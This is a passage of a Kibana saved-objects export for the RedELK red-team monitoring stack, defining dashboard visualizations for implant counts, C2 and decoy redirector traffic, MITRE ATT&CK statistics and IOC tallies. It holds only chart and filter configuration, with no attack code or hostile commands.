"{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Top computers with new implants", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":17,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Hostname\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Username\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Top computers with new implants\"}"}, "coreMigrationVersion": "7.16.2", "id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152856829, 2215], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"NOT (redir.backend.name: c2*)\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic - Decoy", "uiStateJSON": "{\"mapCenter\":[32.93684850365019,0.7170999376103283],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Yellow to Red\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic - Decoy\"}"}, "coreMigrationVersion": "7.16.2", "id": "10dd40f0-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152856829, 2217], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"(redir.backend.name: c2*)\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic - C2", "uiStateJSON": "{\"mapCenter\":[32.93684850365019,0.7170999376103283],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Yellow to Red\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic - C2\"}"}, "coreMigrationVersion": "7.16.2", "id": "1d26da60-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152856829, 2219], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IP Lists metrics", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - IP Lists metrics\",\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{\"customLabel\":\"IPs\"},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":30,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"group\"}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}}}"}, "coreMigrationVersion": "7.16.2", "id": "20fac240-926c-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2221], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Techniques", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-6h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"signal.rule.threat.technique.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - MITRE ATT&CK Techniques\"}"}, "coreMigrationVersion": "7.16.2", "id": "231792d0-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2223], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Tactics", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-6h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"signal.rule.threat.tactic.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - MITRE ATT&CK Tactics\"}"}, "coreMigrationVersion": "7.16.2", "id": "2f5a2760-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2225], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IP Lists donut", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - IP Lists donut\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.source\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"segment\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":30,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.2", "id": "2f77a150-926a-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2227], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Modules results donut", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Modules results donut\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"4\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"module.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Module type\"},\"schema\":\"split\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"module.last_run.status\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Module type\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"row\":true,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.2", "id": "2f971ac0-926b-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "654f76a0-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2229], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC Types tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"ioc.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"IOC Types\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":true,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - IOC Types tag cloud\"}"}, "coreMigrationVersion": "7.16.2", "id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2231], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Screenshots\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Screenshots total count\"}"}, "coreMigrationVersion": "7.16.2", "id": "389dddc0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2233], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Alarmed IOC over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Alarmed IOC\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Alarmed IOC\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Alarmed IOC\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Alarmed IOC over time\"}"}, "coreMigrationVersion": "7.16.2", "id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2235], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads per user tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Downloads\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Downloads per user tag cloud\"}"}, "coreMigrationVersion": "7.16.2", "id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2237], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Dashboard links external", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"markdown\",\"aggs\":[],\"params\":{\"fontSize\":12,\"markdown\":\"**External tools** : [MITRE ATT&CK Navigator](/attack-navigator/) | [Jupyter Notebook](/jupyter/) | [Neo4j Browser](/neo4jbrowser/) \",\"openLinksInNewTab\":true},\"title\":\"RedELK - Dashboard links external\"}"}, "coreMigrationVersion": "7.16.2", "id": "45491770-0886-11eb-a2d2-171dc8941414", "migrationVersion": {"visualization": "7.14.0"}, "references": [], "sort": [1642152856829, 2238], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - TTP Techniques unique count total ", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"threat.technique.id\",\"customLabel\":\"MITRE ATT&CK Techniques\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - TTP Techniques unique count total \"}"}, "coreMigrationVersion": "7.16.2", "id": "464660c0-d360-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2240], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "title": "RedELK - HTTP Redir filters", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir filters\",\"type\":\"input_control_vis\",\"aggs\":[],\"params\":{\"controls\":[{\"id\":\"1627506187584\",\"fieldName\":\"redir.backend.name\",\"parent\":\"\",\"label\":\"Backend\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_0_index_pattern\"},{\"id\":\"1627507362404\",\"fieldName\":\"source.as.organization.name\",\"parent\":\"\",\"label\":\"ASN\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_1_index_pattern\"},{\"id\":\"1627507398459\",\"fieldName\":\"source.geo.country_iso_code\",\"parent\":\"\",\"label\":\"Country\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_2_index_pattern\"},{\"id\":\"1627507415074\",\"fieldName\":\"tags\",\"parent\":\"\",\"label\":\"Tags\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_3_index_pattern\"}],\"updateFiltersOnChange\":true,\"useTimeFilter\":true,\"pinFilters\":false}}"}, "coreMigrationVersion": "7.16.2", "id": "56350050-efe7-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "control_0_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_1_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_2_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_3_index_pattern", "type": "index-pattern"}], "sort": [1642152856829, 2245], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Implants total count ", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Implants\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Implants total count \"}"}, "coreMigrationVersion": "7.16.2", "id": "57626ad0-d355-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2247], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC total count", "uiStateJSON": "{}", "version": 1, "visState": 